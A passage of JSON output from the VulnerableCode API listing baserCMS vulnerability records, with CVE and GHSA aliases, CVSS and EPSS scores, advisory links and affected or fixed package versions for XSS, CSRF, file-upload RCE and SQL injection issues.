"VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9" } ], "aliases": [ "CVE-2023-44379", "GHSA-66c2-p8rh-qx87" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41362?format=api", "vulnerability_id": "VCID-hpk4-a6tr-3ffe", "summary": "baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.", "references": [ { "reference_url": "http://jvn.jp/en/jp/JVN14134801/index.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://jvn.jp/en/jp/JVN14134801/index.html" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39136", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0054", "scoring_system": "epss", "scoring_elements": "0.67989", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0054", "scoring_system": "epss", "scoring_elements": "0.6795", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39136" }, { "reference_url": "https://basercms.net/security/JVN_14134801", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://basercms.net/security/JVN_14134801" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39136", "reference_id": "CVE-2021-39136", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39136" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58790?format=api", "purl": "pkg:composer/baserproject/basercms@4.5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-5ay3-1t5g-vycu" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-891u-x525-ykbb" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-ays7-6wvh-augt" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-j37y-gws9-ake9" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k575-suuf-7bhf" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-kmpp-6j49-pqfz" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zsgc-fnen-b7a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1" } ], "aliases": [ "CVE-2021-39136", "GHSA-hgjr-632x-qpp3" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44713?format=api", "vulnerability_id": "VCID-j37y-gws9-ake9", "summary": "Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25654", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02083", "scoring_system": "epss", "scoring_elements": "0.84309", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.02083", "scoring_system": "epss", "scoring_elements": "0.84332", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25654" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/" } ], "url": "https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96" }, { "reference_url": "https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/" } ], "url": "https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359" }, { "reference_url": "https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/" } ], "url": "https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25654", "reference_id": "CVE-2023-25654", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25654" }, { "reference_url": "https://github.com/advisories/GHSA-h4cc-fxpp-pgw9", "reference_id": "GHSA-h4cc-fxpp-pgw9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-h4cc-fxpp-pgw9" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9", "reference_id": "GHSA-h4cc-fxpp-pgw9", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/64369?format=api", "purl": "pkg:composer/baserproject/basercms@4.7.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zxns-tzw3-27fr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5" } ], "aliases": [ "CVE-2023-25654", "GHSA-h4cc-fxpp-pgw9" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46310?format=api", "vulnerability_id": "VCID-jby7-s5ez-dqb3", "summary": "Cross-Site Request Forgery (CSRF) in baserproject/basercms.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43649", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.3025", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43649" }, { "reference_url": "https://basercms.net/security/JVN_99052047", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/" } ], "url": "https://basercms.net/security/JVN_99052047" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/" } ], "url": "https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43649", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43649" }, { "reference_url": "https://github.com/advisories/GHSA-fw9x-cqjq-7jx5", "reference_id": "GHSA-fw9x-cqjq-7jx5", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-fw9x-cqjq-7jx5" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5", "reference_id": "GHSA-fw9x-cqjq-7jx5", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api", "purl": "pkg:composer/baserproject/basercms@4.8.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/67580?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0" } ], "aliases": [ "CVE-2023-43649", "GHSA-fw9x-cqjq-7jx5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/109461?format=api", "vulnerability_id": "VCID-k575-suuf-7bhf", "summary": "baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-41994", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00143", "scoring_system": "epss", "scoring_elements": "0.34314", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00143", "scoring_system": "epss", "scoring_elements": "0.34412", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-41994" }, { "reference_url": "https://basercms.net/security/JVN_53682526", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/" } ], "url": "https://basercms.net/security/JVN_53682526" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://jvn.jp/en/jp/JVN53682526/index.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/" } ], "url": "https://jvn.jp/en/jp/JVN53682526/index.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41994", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41994" }, { "reference_url": "https://github.com/advisories/GHSA-vxwf-79ch-f7f7", "reference_id": "GHSA-vxwf-79ch-f7f7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vxwf-79ch-f7f7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/146599?format=api", "purl": "pkg:composer/baserproject/basercms@4.7.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-j37y-gws9-ake9" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zsgc-fnen-b7a6" }, { "vulnerability": "VCID-zxns-tzw3-27fr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2" } ], "aliases": [ "CVE-2022-41994", "GHSA-vxwf-79ch-f7f7" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90792?format=api", "vulnerability_id": "VCID-k5qv-4yp3-zbgf", "summary": "baserCMS has an SQL injection vulnerability in its blog post functionality\nbaserCMS has a SQL injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02096", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697" }, { "reference_url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p", "reference_id": "GHSA-vh89-rjph-2g7p", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-27697", "GHSA-vh89-rjph-2g7p" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56066?format=api", "vulnerability_id": "VCID-khft-xvrw-g3dr", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request\nXSS vulnerability in HTTP 400 Bad Request to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75582", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://basercms.net/security/JVN_06274755", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": 